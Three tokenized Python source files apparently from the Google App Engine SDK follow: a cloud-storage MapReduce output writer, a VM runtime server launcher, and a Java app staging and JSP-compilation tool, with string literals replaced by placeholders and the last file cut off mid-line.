shard_attempt , _writer_state = None ) : <EOL> """<STR_LIT>""" <EOL> writer_spec = cls . get_params ( mr_spec . mapper , allow_old = False ) <EOL> key = cls . _generate_filename ( writer_spec , mr_spec . name , <EOL> mr_spec . mapreduce_id , <EOL> shard_number , shard_attempt ) <EOL> status = _ConsistentStatus ( ) <EOL> status . writer_spec = writer_spec <EOL> status . mainfile = cls . _open_file ( writer_spec , key ) <EOL> status . mapreduce_id = mr_spec . mapreduce_id <EOL> status . shard = shard_number <EOL> return cls ( status ) <EOL> def _remove_tmpfile ( self , filename , writer_spec ) : <EOL> if not filename : <EOL> return <EOL> account_id = self . _get_tmp_account_id ( writer_spec ) <EOL> try : <EOL> cloudstorage_api . delete ( filename , _account_id = account_id ) <EOL> except cloud_errors . NotFoundError : <EOL> pass <EOL> def _exists_in_gcs ( self , filename , _account_id = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> with cloudstorage_api . open ( filename , _account_id = _account_id ) : <EOL> return True <EOL> except cloud_errors . NotFoundError : <EOL> return False <EOL> def _rewrite_tmpfile ( self , mainfile , tmpfile , writer_spec ) : <EOL> """<STR_LIT>""" <EOL> account_id = self . _get_tmp_account_id ( writer_spec ) <EOL> try : <EOL> f = cloudstorage_api . open ( tmpfile , _account_id = account_id ) <EOL> except cloud_errors . NotFoundError : <EOL> if self . _exists_in_gcs ( mainfile . name , _account_id = account_id ) : <EOL> return <EOL> raise <EOL> data = f . read ( self . _REWRITE_BLOCK_SIZE ) <EOL> while data : <EOL> mainfile . write ( data ) <EOL> data = f . read ( self . _REWRITE_BLOCK_SIZE ) <EOL> f . close ( ) <EOL> mainfile . flush ( ) <EOL> @ classmethod <EOL> def _create_tmpfile ( cls , status ) : <EOL> """<STR_LIT>""" <EOL> tmpl = string . Template ( cls . _TMPFILE_PATTERN ) <EOL> filename = tmpl . substitute ( <EOL> id = status . mapreduce_id , shard = status . shard , <EOL> random = random . getrandbits ( cls . _RAND_BITS ) ) <EOL> return cls . _open_file ( status . writer_spec , filename , use_tmp_bucket = True ) <EOL> def begin_slice ( self , slice_ctx ) : <EOL> status = self . status <EOL> writer_spec = status . writer_spec <EOL> if status . tmpfile_1ago : <EOL> self . _remove_tmpfile ( status . tmpfile_1ago . name , writer_spec ) <EOL> files_to_keep = [ ] <EOL> if status . tmpfile : <EOL> self . _rewrite_tmpfile ( status . mainfile , status . tmpfile . name , writer_spec ) <EOL> files_to_keep . append ( status . tmpfile . name ) <EOL> self . _try_to_clean_garbage ( <EOL> writer_spec , exclude_list = files_to_keep ) <EOL> status . tmpfile_1ago = status . tmpfile <EOL> status . tmpfile = self . _create_tmpfile ( status ) <EOL> if status . mainfile . closed : <EOL> status . tmpfile . close ( ) <EOL> self . _remove_tmpfile ( status . tmpfile . name , writer_spec ) <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> return cls ( pickle . loads ( state [ cls . _JSON_STATUS ] ) ) <EOL> def end_slice ( self , slice_ctx ) : <EOL> self . status . tmpfile . close ( ) <EOL> def to_json ( self ) : <EOL> return { self . _JSON_STATUS : pickle . dumps ( self . status ) } <EOL> def write ( self , data ) : <EOL> super ( GoogleCloudStorageConsistentOutputWriter , self ) . write ( data ) <EOL> self . _data_written_to_slice = True <EOL> def _try_to_clean_garbage ( self , writer_spec , exclude_list = ( ) ) : <EOL> """<STR_LIT>""" <EOL> tmpl = string . Template ( self . _TMPFILE_PREFIX ) <EOL> prefix = tmpl . substitute ( <EOL> id = self . status . mapreduce_id , shard = self . status . shard ) <EOL> bucket = self . _get_tmp_gcs_bucket ( writer_spec ) <EOL> account_id = self . _get_tmp_account_id ( writer_spec ) <EOL> for f in cloudstorage . listbucket ( "<STR_LIT>" % ( bucket , prefix ) , <EOL> _account_id = account_id ) : <EOL> if f . filename not in exclude_list : <EOL> self . _remove_tmpfile ( f . filename , self . status . writer_spec ) <EOL> def finalize ( self , ctx , shard_state ) : <EOL> if self . _data_written_to_slice : <EOL> raise errors . FailJobError ( <EOL> "<STR_LIT>" ) <EOL> if self . status . tmpfile : <EOL> self . status . tmpfile . close ( ) <EOL> self . status . mainfile . close ( ) <EOL> if self . status . tmpfile_1ago : <EOL> self . _remove_tmpfile ( self . status . tmpfile_1ago . name , <EOL> self . status . writer_spec ) <EOL> if self . status . tmpfile : <EOL> self . _remove_tmpfile ( self . status . tmpfile . name , <EOL> self . status . writer_spec ) <EOL> self . _try_to_clean_garbage ( self . status . writer_spec ) <EOL> shard_state . writer_state = { "<STR_LIT:filename>" : self . status . mainfile . name } <EOL> class _GoogleCloudStorageRecordOutputWriterBase ( _GoogleCloudStorageBase ) : <EOL> """<STR_LIT>""" <EOL> WRITER_CLS = None <EOL> def __init__ ( self , writer ) : <EOL> self . _writer = writer <EOL> self . _record_writer = records . RecordsWriter ( writer ) <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> return cls . WRITER_CLS . validate ( mapper_spec ) <EOL> @ classmethod <EOL> def init_job ( cls , mapreduce_state ) : <EOL> return cls . WRITER_CLS . init_job ( mapreduce_state ) <EOL> @ classmethod <EOL> def finalize_job ( cls , mapreduce_state ) : <EOL> return cls . WRITER_CLS . finalize_job ( mapreduce_state ) <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> return cls ( cls . WRITER_CLS . from_json ( state ) ) <EOL> def to_json ( self ) : <EOL> return self . _writer . to_json ( ) <EOL> @ classmethod <EOL> def create ( cls , mr_spec , shard_number , shard_attempt , _writer_state = None ) : <EOL> return cls ( cls . WRITER_CLS . create ( mr_spec , shard_number , shard_attempt , <EOL> _writer_state ) ) <EOL> def write ( self , data ) : <EOL> self . _record_writer . write ( data ) <EOL> def finalize ( self , ctx , shard_state ) : <EOL> return self . _writer . finalize ( ctx , shard_state ) <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> return cls . WRITER_CLS . get_filenames ( mapreduce_state ) <EOL> def _supports_shard_retry ( self , tstate ) : <EOL> return self . _writer . _supports_shard_retry ( tstate ) <EOL> def _supports_slice_recovery ( self , mapper_spec ) : <EOL> return self . _writer . _supports_slice_recovery ( mapper_spec ) <EOL> def _recover ( self , mr_spec , shard_number , shard_attempt ) : <EOL> return self . _writer . _recover ( mr_spec , shard_number , shard_attempt ) <EOL> def begin_slice ( self , slice_ctx ) : <EOL> return self . _writer . begin_slice ( slice_ctx ) <EOL> def end_slice ( self , slice_ctx ) : <EOL> if not self . _writer . _get_write_buffer ( ) . closed : <EOL> self . _record_writer . _pad_block ( ) <EOL> return self . _writer . end_slice ( slice_ctx ) <EOL> class _GoogleCloudStorageRecordOutputWriter ( <EOL> _GoogleCloudStorageRecordOutputWriterBase ) : <EOL> WRITER_CLS = _GoogleCloudStorageOutputWriter <EOL> GoogleCloudStorageRecordOutputWriter = _GoogleCloudStorageRecordOutputWriter <EOL> class GoogleCloudStorageConsistentRecordOutputWriter ( <EOL> _GoogleCloudStorageRecordOutputWriterBase ) : <EOL> WRITER_CLS = GoogleCloudStorageConsistentOutputWriter <EOL> class _GoogleCloudStorageKeyValueOutputWriter ( <EOL> _GoogleCloudStorageRecordOutputWriter ) : <EOL> """<STR_LIT>""" <EOL> def write ( self , data ) : <EOL> if len ( data ) != <NUM_LIT:2> : <EOL> logging . error ( "<STR_LIT>" , <EOL> len ( data ) , data ) <EOL> try : <EOL> key = str ( data [ <NUM_LIT:0> ] ) <EOL> value = str ( data [ <NUM_LIT:1> ] ) <EOL> except TypeError : <EOL> logging . error ( "<STR_LIT>" , <EOL> data . __class__ . __name__ , data ) <EOL> proto = kv_pb . KeyValue ( ) <EOL> proto . set_key ( key ) <EOL> proto . set_value ( value ) <EOL> GoogleCloudStorageRecordOutputWriter . write ( self , proto . Encode ( ) ) <EOL> GoogleCloudStorageKeyValueOutputWriter = _GoogleCloudStorageKeyValueOutputWriter </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> import logging <EOL> import SocketServer <EOL> import sys <EOL> import traceback <EOL> from wsgiref import simple_server <EOL> from google . appengine . api import appinfo_includes <EOL> from google . appengine . ext . vmruntime import meta_app <EOL> from google . appengine . ext . vmruntime import middlewares <EOL> from google . appengine . ext . vmruntime import vmconfig <EOL> from google . appengine . ext . vmruntime import vmstub <EOL> try : <EOL> import googleclouddebugger <EOL> except ImportError : <EOL> pass <EOL> LISTENING_HOST = '<STR_LIT>' <EOL> HTTP_PORT = <NUM_LIT> <EOL> class VmRuntimeServer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port , app , appinfo_external ) : <EOL> """<STR_LIT>""" <EOL> self . _host , self . _port = host , port <EOL> self . _app = app <EOL> self . _appinfo_external = appinfo_external <EOL> self . _server = self . CreateServer ( ) <EOL> logging . info ( '<STR_LIT>' , self . _host , self . _port ) <EOL> def RunForever ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def CreateServer ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> class VmRuntimeWSGIRefServer ( VmRuntimeServer ) : <EOL> def CreateServer ( self ) : <EOL> return simple_server . make_server ( <EOL> self . _host , self . _port , self . _app , <EOL> server_class = self . _ThreadingWSGIServer ) <EOL> def RunForever ( self ) : <EOL> try : <EOL> self . _server . serve_forever ( ) <EOL> except : <EOL> logging . error ( '<STR_LIT>' , self . _host , self . _port ) <EOL> raise <EOL> class _ThreadingWSGIServer ( SocketServer . ThreadingMixIn , <EOL> simple_server . WSGIServer ) : <EOL> daemon_threads = True <EOL> class VmRuntimeCherryPyServer ( VmRuntimeServer ) : <EOL> def CreateServer ( self ) : <EOL> from cherrypy . wsgiserver import wsgiserver2 <EOL> wsgiserver2 . socket_error_eintr . append ( <NUM_LIT> ) <EOL> return wsgiserver2 . CherryPyWSGIServer ( <EOL> ( self . _host , self . _port ) , self . _app , <EOL> numthreads = middlewares . MAX_CONCURRENT_REQUESTS , <EOL> request_queue_size = middlewares . MAX_CONCURRENT_REQUESTS ) <EOL> def RunForever ( self ) : <EOL> try : <EOL> self . _server . start ( ) <EOL> except : <EOL> logging . error ( '<STR_LIT>' , self . _host , self . _port ) <EOL> raise <EOL> class VmService ( object ) : <EOL> """<STR_LIT>""" <EOL> server_class = VmRuntimeWSGIRefServer <EOL> server_class = VmRuntimeCherryPyServer <EOL> def __init__ ( self , filename , host , port ) : <EOL> self . filename = filename <EOL> self . host = host <EOL> self . port = port <EOL> self . server = None <EOL> def CreateServer ( self ) : <EOL> with open ( self . filename ) as stream : <EOL> appinfo_external = appinfo_includes . Parse ( stream ) <EOL> appengine_config = vmconfig . BuildVmAppengineEnvConfig ( ) <EOL> vmstub . Register ( vmstub . VMStub ( appengine_config . default_ticket ) ) <EOL> if '<STR_LIT>' in sys . modules : <EOL> try : <EOL> googleclouddebugger . AttachDebugger ( ) <EOL> except Exception as e : <EOL> logging . warn ( '<STR_LIT>' , <EOL> traceback . format_exc ( e ) ) <EOL> try : <EOL> import appengine_config as user_appengine_config <EOL> except ImportError : <EOL> pass <EOL> app = meta_app . FullyWrappedApp ( appinfo_external , appengine_config ) <EOL> self . server = self . server_class ( self . host , self . port , app , <EOL> appinfo_external ) <EOL> logging . info ( '<STR_LIT>' , self . host , self . port ) <EOL> def StartServer ( self ) : <EOL> assert self . server <EOL> self . server . RunForever ( ) <EOL> def CreateAndRunService ( config_filename ) : <EOL> """<STR_LIT>""" <EOL> service = VmService ( config_filename , LISTENING_HOST , HTTP_PORT ) <EOL> service . CreateServer ( ) <EOL> service . StartServer ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> import collections <EOL> import os . path <EOL> import re <EOL> import shutil <EOL> import stat <EOL> import subprocess <EOL> import sys <EOL> import tempfile <EOL> from google . appengine . datastore import datastore_index <EOL> from google . appengine . datastore import datastore_index_xml <EOL> from google . appengine . tools import app_engine_web_xml_parser <EOL> from google . appengine . tools import backends_xml_parser <EOL> from google . appengine . tools import cron_xml_parser <EOL> from google . appengine . tools import dispatch_xml_parser <EOL> from google . appengine . tools import dos_xml_parser <EOL> from google . appengine . tools import jarfile <EOL> from google . appengine . tools import java_quickstart <EOL> from google . appengine . tools import java_utils <EOL> from google . appengine . tools import queue_xml_parser <EOL> from google . appengine . tools import web_xml_parser <EOL> from google . appengine . tools import xml_parser_utils <EOL> from google . appengine . tools import yaml_translator <EOL> _CLASSES_JAR_NAME_PREFIX = '<STR_LIT>' <EOL> _COMPILED_JSP_JAR_NAME_PREFIX = '<STR_LIT>' <EOL> _LOCAL_JSPC_CLASS = '<STR_LIT>' <EOL> _MAX_COMPILED_JSP_JAR_SIZE = <NUM_LIT> * <NUM_LIT> * <NUM_LIT:5> <EOL> class Error ( Exception ) : <EOL> pass <EOL> class ConfigurationError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class CompileError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def IsWarFileWithoutYaml ( dir_path ) : <EOL> if os . path . isfile ( os . path . join ( dir_path , '<STR_LIT>' ) ) : <EOL> return False <EOL> web_inf = os . path . join ( dir_path , '<STR_LIT>' ) <EOL> return ( os . path . isdir ( web_inf ) and <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) . issubset ( os . listdir ( web_inf ) ) ) <EOL> def AddUpdateOptions ( parser ) : <EOL> """<STR_LIT>""" <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , default = True , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class JavaAppUpdate ( object ) : <EOL> """<STR_LIT>""" <EOL> _JSP_REGEX = re . compile ( '<STR_LIT>' ) <EOL> _xml_parser = collections . namedtuple ( <EOL> '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> _XML_PARSERS = [ <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , <EOL> backends_xml_parser . GetBackendsYaml ) , <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , cron_xml_parser . GetCronYaml ) , <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , <EOL> dispatch_xml_parser . GetDispatchYaml ) , <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , dos_xml_parser . GetDosYaml ) , <EOL> _xml_parser ( '<STR_LIT>' , '<STR_LIT>' , queue_xml_parser . GetQueueYaml ) , <EOL> ] <EOL> _XML_VALIDATOR_CLASS = '<STR_LIT>' <EOL> def __init__ ( self , basepath , options ) : <EOL> self . basepath = os . path . abspath ( basepath ) <EOL> self . options = options <EOL> if not hasattr ( self . options , '<STR_LIT>' ) : <EOL> self . options . no_symlinks = True <EOL> java_home , exec_suffix = java_utils . JavaHomeAndSuffix ( ) <EOL> self . java_command = os . path . join ( java_home , '<STR_LIT>' , '<STR_LIT>' + exec_suffix ) <EOL> self . javac_command = os . path . join ( java_home , '<STR_LIT>' , '<STR_LIT>' + exec_suffix ) <EOL> self . _ValidateXmlFiles ( ) <EOL> self . app_engine_web_xml = self . _ReadAppEngineWebXml ( ) <EOL> self . app_engine_web_xml . app_root = self . basepath <EOL> if self . options . app_id : <EOL> self . app_engine_web_xml . app_id = self . options . app_id <EOL> if self . options . version : <EOL> self . app_engine_web_xml . version_id = self . options . version <EOL> quickstart = xml_parser_utils . BooleanValue ( <EOL> self . app_engine_web_xml . beta_settings . get ( '<STR_LIT>' , '<STR_LIT:false>' ) ) <EOL> if quickstart : <EOL> web_xml_str , _ = java_quickstart . quickstart_generator ( self . basepath ) <EOL> webdefault_xml_str = java_quickstart . get_webdefault_xml ( ) <EOL> web_xml_str = java_quickstart . remove_mappings ( <EOL> web_xml_str , webdefault_xml_str ) <EOL> self . web_xml = web_xml_parser . WebXmlParser ( ) . ProcessXml ( web_xml_str ) <EOL> else : <EOL> self . web_xml = self . _ReadWebXml ( ) <EOL> def _ValidateXmlFiles ( self ) : <EOL> sdk_dir = os . path . dirname ( jarfile . __file__ ) <EOL> xml_validator_jar = os . path . join ( <EOL> sdk_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( xml_validator_jar ) : <EOL> print >> sys . stderr , ( '<STR_LIT>' <EOL> '<STR_LIT>' % xml_validator_jar ) <EOL> return <EOL> validator_args = [ ] <EOL> schema_dir = os . path . join ( sdk_dir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for schema_name in os . listdir ( schema_dir ) : <EOL> basename , extension = os . path . splitext ( schema_name ) <EOL> if extension == '<STR_LIT>' : <EOL> schema_file = os . path . join ( schema_dir , schema_name ) <EOL> xml_file = os . path . join ( self . basepath , '<STR_LIT>' , basename + '<STR_LIT>' ) <EOL> if os . path . exists ( xml_file ) : <EOL> validator_args += [ xml_file , schema_file ] <EOL> if validator_args : <EOL> command_and_args = [ <EOL> self . java_command , <EOL> '<STR_LIT>' , <EOL> xml_validator_jar , <EOL> self . _XML_VALIDATOR_CLASS , <EOL> ] + validator_args <EOL> status = subprocess . call ( command_and_args ) <EOL> if status : <EOL> raise ConfigurationError ( '<STR_LIT>' ) <EOL> def _ReadAppEngineWebXml ( self ) : <EOL> return self . _ReadAndParseXml ( <EOL> basepath = self . basepath , <EOL> file_name = '<STR_LIT>' , <EOL> parser = app_engine_web_xml_parser . AppEngineWebXmlParser ) <EOL> def _ReadWebXml ( self , basepath = None ) : <EOL> if not basepath : <EOL> basepath = self . basepath <EOL> return self . _ReadAndParseXml ( <EOL> basepath = basepath , <EOL> file_name = '<STR_LIT>' , <EOL> parser = web_xml_parser . WebXmlParser ) <EOL> def _ReadAndParseXml ( self , basepath , file_name , parser ) : <EOL> with open ( os . path . join ( basepath , '<STR_LIT>' , file_name ) ) as file_handle : <EOL> return parser ( ) . ProcessXml ( file_handle . read ( ) ) <EOL> def CreateStagingDirectory ( self , tools_dir ) : <EOL> """<STR_LIT>""" <EOL> stage_dir = tempfile . mkdtemp ( prefix = '<STR_LIT>' ) <EOL> static_dir = os . path . join ( stage_dir , '<STR_LIT>' ) <EOL> os . mkdir ( static_dir ) <EOL> self . _CopyOrLink ( self . basepath , stage_dir , static_dir , False ) <EOL> self . app_engine_web_xml . app_root = stage_dir <EOL> if self . options . compile_jsps : <EOL> self . _CompileJspsIfAny ( tools_dir , stage_dir ) <EOL> web_inf = os . path . join ( stage_dir , '<STR_LIT>' ) <EOL> web_inf_lib = os . path . join ( web_inf , '<STR_LIT>' ) <EOL> api_jar_dict = _FindApiJars ( web_inf_lib ) <EOL> api_versions = set ( api_jar_dict . values ( ) ) <EOL> if not api_versions : <EOL> api_version = None <EOL> elif len ( api_versions ) == <NUM_LIT:1> : <EOL> api_version = api_versions . pop ( ) <EOL> else : <EOL> raise ConfigurationError ( '<STR_LIT>' % <EOL> api_jar_dict ) <EOL> for staged_api_jar in api_jar_dict : <EOL> os . remove ( staged_api_jar ) <EOL> appengine_generated = os . path . join ( <EOL> stage_dir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _GenerateAppYaml ( stage_dir , api_version , appengine_generated ) <EOL> app_id = self . options . app_id or self . app_engine_web_xml . app_id <EOL> assert app_id , '<STR_LIT>' <EOL> for parser in self . _XML_PARSERS : <EOL> xml_name = os . path . join ( web_inf , parser . xml_name ) <EOL> if os . path . exists ( xml_name ) : <EOL> with open ( xml_name ) as xml_file : <EOL> xml_string = xml_file . read ( ) <EOL> yaml_string = parser . xml_to_yaml_function ( app_id , xml_string ) <EOL> yaml_file = os . path . join ( appengine_generated , parser . yaml_name ) <EOL> with open ( yaml_file , '<STR_LIT:w>' ) as yaml : <EOL> yaml . write ( yaml_string ) <EOL> indexes = [ ] <EOL> for xml_name in ( <EOL> '<STR_LIT>' , <EOL> os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> xml_name = os . path . join ( self . basepath , '<STR_LIT>' , xml_name ) <EOL> if os . path . exists ( xml_name ) : <EOL> with open ( xml_name ) as xml_file : <EOL> xml_string = xml_file . read ( ) <EOL> index_definitions = datastore_index_xml . IndexesXmlToIndexDefinitions ( <EOL> xml_string ) <EOL> indexes . extend ( index_definitions . indexes ) <EOL> if indexes : <EOL> yaml_string = datastore_index . IndexDefinitions ( indexes = indexes ) . ToYAML ( ) <EOL> yaml_file = os . path . join ( appengine_generated , '<STR_LIT>' ) <EOL> with open ( yaml_file , '<STR_LIT:w>' ) as yaml : <EOL> yaml . write ( yaml_string ) <EOL> return stage_dir <EOL> def GenerateAppYamlString ( self , static_file_list , api_version = None ) : <EOL> """<STR_LIT>""" <EOL> return yaml_translator . AppYamlTranslator ( <EOL> self . app_engine_web_xml , <EOL> self . web_xml , <EOL> static_file_list , <EOL> api_version ) . GetYaml ( ) <EOL> def _GenerateAppYaml ( self , stage_dir , api_version , appengine_generated ) : <EOL> """<STR_LIT>""" <EOL> static_file_list = self . _GetStaticFileList ( stage_dir ) <EOL> yaml_str = self . GenerateAppYamlString ( static_file_list , api_version ) <EOL> if not os . path . isdir ( appengine_generated ) : <EOL> os . mkdir ( appengine_generated ) <EOL> with open ( os . path . join ( appengine_generated , '<STR_LIT>' ) , '<STR_LIT:w>' ) as handle : <EOL> handle . write ( yaml_str ) <EOL> def _CopyOrLink ( self , source_dir , stage_dir , static_dir , inside_web_inf ) : <EOL> source_dir = os . path . abspath ( source_dir ) <EOL> stage_dir = os . path . abspath ( stage_dir ) <EOL> static_dir = os . path . abspath ( static_dir ) <EOL> for file_name in os . listdir ( source_dir ) : <EOL> file_path = os . path . join ( source_dir , file_name ) <EOL> if file_name . startswith ( '<STR_LIT:.>' ) or file_name == '<STR_LIT>' : <EOL> continue <EOL> if os . path . isdir ( file_path ) : <EOL> self . _CopyOrLink ( <EOL> file_path , <EOL> os . path . join ( stage_dir , file_name ) , <EOL> os . path . join ( static_dir , file_name ) , <EOL> inside_web_inf or file_name == '<STR_LIT>' ) <EOL> else : <EOL> if ( inside_web_inf <EOL> or self . app_engine_web_xml . IncludesResource ( file_path ) <EOL> or ( self . options . compile_jsps <EOL> and file_path . lower ( ) . endswith ( '<STR_LIT>' ) ) ) : <EOL> self . _CopyOrLinkFile ( file_path , os . path . join ( stage_dir , file_name ) ) <EOL> if ( not inside_web_inf <EOL> and self . app_engine_web_xml . IncludesStatic ( file_path ) ) : <EOL> self . _CopyOrLinkFile ( file_path , os . path . join ( static_dir , file_name ) ) <EOL> def _CopyOrLinkFile ( self , source , dest ) : <EOL> destdir = os . path . dirname ( dest ) <EOL> if not os . path . exists ( destdir ) : <EOL> os . makedirs ( destdir ) <EOL> if self . _ShouldSplitJar ( source ) : <EOL> self . _SplitJar ( source , destdir ) <EOL> elif source . endswith ( '<STR_LIT>' ) : <EOL> shutil . copy ( source , dest ) <EOL> os . chmod ( dest , os . stat ( dest ) . st_mode | stat . S_IWRITE ) <EOL> elif self . options . no_symlinks : <EOL> shutil . copy ( source , dest ) <EOL> else : <EOL> os . symlink ( source , dest ) <EOL> def _MoveDirectoryContents ( self , source_dir , dest_dir ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( dest_dir ) : <EOL> os . mkdir ( dest_dir ) <EOL> for entry in os . listdir ( source_dir ) : <EOL> source_entry = os . path . join ( source_dir , entry ) <EOL> dest_entry = os . path . join ( dest_dir , entry ) <EOL> if os . path . exists ( dest_entry ) : <EOL> if os . path . isdir ( source_entry ) and os . path . isdir ( dest_entry ) : <EOL> self . _MoveDirectoryContents ( source_entry , dest_entry ) <EOL> else : <EOL> raise IOError ( '<STR_LIT>' % dest_entry ) <EOL> else : <EOL> shutil . move ( source_entry , dest_entry ) <EOL> _MAX_SIZE = <NUM_LIT:32> * <NUM_LIT:1000> * <NUM_LIT:1000> <EOL> def _ShouldSplitJar ( self , path ) : <EOL> return ( path . lower ( ) . endswith ( '<STR_LIT>' ) and self . options . do_jar_splitting and <EOL> os . path . getsize ( path ) >= self . _MAX_SIZE ) <EOL> def _SplitJar ( self , jar_path , dest_dir ) : <EOL> """<STR_LIT>""" <EOL> exclude_suffixes = ( <EOL> set ( self . options . jar_splitting_exclude_suffixes . split ( '<STR_LIT:U+002C>' ) ) - set ( [ '<STR_LIT>' ] ) ) <EOL> include = lambda name : not any ( name . endswith ( s ) for s in exclude_suffixes ) <EOL> jarfile . SplitJar ( jar_path , dest_dir , self . _MAX_SIZE , include ) <EOL> @ staticmethod <EOL> def _GetStaticFileList ( staging_dir ) : <EOL> return _FilesMatching ( os . path . join ( staging_dir , '<STR_LIT>' ) ) <EOL> def _CompileJspsIfAny ( self , tools_dir , staging_dir ) : <EOL> """<STR_LIT>""" <EOL> if self . _MatchingFileExists ( self . _JSP_REGEX , staging_dir ) : <EOL> gen_dir = tempfile . mkdtemp ( ) <EOL> try : <EOL> self . _CompileJspsWithGenDir ( tools_dir , staging_dir , gen_dir ) <EOL> finally : <EOL> shutil . rmtree ( gen_dir ) <EOL> def _CompileJspsWithGenDir ( self , tools_dir , staging_dir , gen_dir ) : <EOL> staging_web_inf = os . path . join ( staging_dir , '<STR_LIT>' ) <EOL> lib_dir = os . path . join ( staging_web_inf , '<STR_LIT>' ) <EOL> for jar_file in GetUserJspLibFiles ( tools_dir ) : <EOL> self . _CopyOrLinkFile ( <EOL> jar_file , os . path . join ( lib_dir , os . path . basename ( jar_file ) ) ) <EOL> for jar_file in GetSharedJspLibFiles ( tools_dir ) : <EOL> self . _CopyOrLinkFile ( <EOL> jar_file , os . path . join ( lib_dir , os . path . basename ( jar_file ) ) ) <EOL> classes_dir = os . path . join ( staging_web_inf , '<STR_LIT>' ) <EOL> generated_web_xml = os . path . join ( staging_web_inf , '<STR_LIT>' ) <EOL> classpath = self . _GetJspClasspath ( tools_dir , classes_dir , gen_dir ) <EOL> command_and_args = [ <EOL> self . java_command , <EOL> '<STR_LIT>' , classpath , <EOL> _LOCAL_JSPC_CLASS , <EOL> '<STR_LIT>' , staging_dir , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , generated_web_xml , <EOL> '<STR_LIT>' , gen_dir , <EOL> '<STR_LIT>' , self . options . compile_encoding , <EOL> ] <EOL> status = subprocess . call ( command_and_args ) <EOL> if status : <EOL> raise CompileError ( <EOL> '<STR_LIT>' % status ) <EOL> self . _CompileJavaFiles ( classpath , staging_web_inf , gen_dir ) <EOL> self . web_xml = self . _ReadWebXml ( staging_dir ) <EOL> def _CompileJavaFiles ( self , classpath , web_inf , jsp_class_dir ) : <EOL> """<STR_LIT>""" <EOL> java_files = _FilesMatching ( jsp_class_dir , lambda f : f . endswith ( '<STR_LIT>' ) ) <EOL> if not java_files : <EOL> return <EOL> command_and_args = [ <EOL> self . javac_command , <EOL> '<STR_LIT>' , classpath , <EOL> '<STR_LIT>' , jsp_class_dir , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , self . options . compile_encoding , <EOL> ] + java_files <EOL> status = subprocess . call ( command_and_args ) <EOL> if status : <EOL> raise CompileError ( <EOL> '<STR_LIT>' % status ) <EOL> if self . options . jar_jsps : <EOL> self . _ZipJasperGeneratedFiles ( web_inf , jsp_class_dir ) <EOL> else : <EOL> web_inf_classes = os . path . join ( web_inf , '<STR_LIT>' ) <EOL> self . _MoveDirectoryContents ( jsp_class_dir , web_inf_classes ) <EOL> if self . options . delete_jsps : <EOL> jsps = _FilesMatching ( os . path . dirname ( web_inf ) , <EOL> lambda f : f . endswith ( '<STR_LIT>' ) ) <EOL> for f in jsps : <EOL> os . remove ( f ) <EOL> if self . options . do_jar_classes : <EOL> self . _ZipWebInfClassesFiles ( web_inf ) <EOL> @ staticmethod <EOL> def _ZipJasperGeneratedFiles ( web_inf , jsp_class_dir ) : <EOL> lib_dir = os . path . join ( web_inf , '<STR_LIT>' ) <EOL> jarfile . Make ( jsp_class_dir , lib_dir , _COMPILED_JSP_JAR_NAME_PREFIX , <EOL> maximum_size = _MAX_COMPILED_JSP_JAR_SIZE , <EOL> include_predicate = lambda name : not name . endswith ( '<STR_LIT>' ) ) <EOL> @ staticmethod <EOL> def _ZipWebInfClassesFiles ( web_inf ) : <EOL> lib_dir = os . path . join ( web_inf , 